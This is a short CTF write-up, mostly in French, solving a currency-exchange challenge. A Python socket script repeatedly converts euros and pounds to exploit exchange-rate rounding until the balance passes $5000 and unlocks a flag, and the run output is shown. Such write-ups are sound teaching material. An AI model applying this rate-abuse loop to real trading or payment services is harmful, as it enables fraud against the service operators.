i wanna access the restricted area 95.170.83.28:3003
On se connecte à un service où il est possible de faire des échanges de monnaie (d'une monnaie à une autre). Qui dit échanges, dit taux. Passer d'une monnaie à une autre puis faire le chemin inverse revient à perdre ou à gagner de l'argent !
Le but ici va être de récupérer $5000 à partir de $100, 100€ et 100£.
J'ai choisie de jouer avec les € et les £ pour ensuite convertir les € en $.
€ => £ £ => € ... € => $
import socket def msg(data): return data + "\n" def parseamount(buffer): splt = buffer.split(' , ') usd = splt[0][17:-4] eur = splt[1][:-4] gbp = splt[2][:-9] return (usd, eur, gbp) def main(): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect(('95.170.83.28', 3003)) USD = 100 EUR = 100 GBP = 100 sock.recv(512) # welcome message sock.recv(512) # wanna trade? sock.send(msg('yes')) # YES! sock.recv(512) # username? sock.send(msg('Xartrick')) # here! sock.recv(512) # Thanks! while 1: # GBP to EUR sock.recv(512) # get menu sock.send(msg('2')) # exchange sock.recv(512) # destination? sock.send(msg('EUR')) # EUR! sock.recv(512) # source? sock.send(msg('GBP')) # GBP! sock.recv(512) # amount? sock.send(msg(str(GBP))) # GBP value buffer = sock.recv(512) # get current values (USD, EUR, GBP) = parseamount(buffer) print 'EUR =>', EUR if float(EUR) > 5000.0: break # EUR to GBP sock.recv(512) # get menu sock.send(msg('2')) # exchange sock.recv(512) # destination? sock.send(msg('GBP')) # GBP! sock.recv(512) # source? sock.send(msg('EUR')) # EUR! sock.recv(512) # amount? sock.send(msg(str(EUR))) # EUR value buffer = sock.recv(512) # get current values (USD, EUR, GBP) = parseamount(buffer) print 'GBP =>', GBP # EUR to USD sock.recv(512) # get menu sock.send(msg('2')) # exchange sock.recv(512) # destination? sock.send(msg('USD')) # USD! sock.recv(512) # source? sock.send(msg('EUR')) # EUR! sock.recv(512) # amount? sock.send(msg(str(EUR))) # EUR value buffer = sock.recv(512) # get current values (USD, EUR, GBP) = parseamount(buffer) print print 'USD =>', USD print sock.recv(512) # get menu sock.send(msg('4')) # restricted area buffer = sock.recv(512) print buffer sock.close() main()
C:\CTF\FBCTF\x93>script.py EUR => 253.85 GBP => 218.31 EUR => 335.86 GBP => 288.84 EUR => 444.37 GBP => 382.16 EUR => 587.94 GBP => 505.63 EUR => 777.89 GBP => 668.99 EUR => 1029.22 GBP => 885.13 EUR => 1361.74 GBP => 1171.1 EUR => 1801.69 GBP => 1549.45 EUR => 2383.77 GBP => 2050.04 EUR => 3153.91 GBP => 2712.36 EUR => 4172.86 GBP => 3588.66 EUR => 5521.02 USD => 6062.7 FLAG{7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0}
7d21ca3a7a2f068347efac7c2c9794bdb3bd0ab0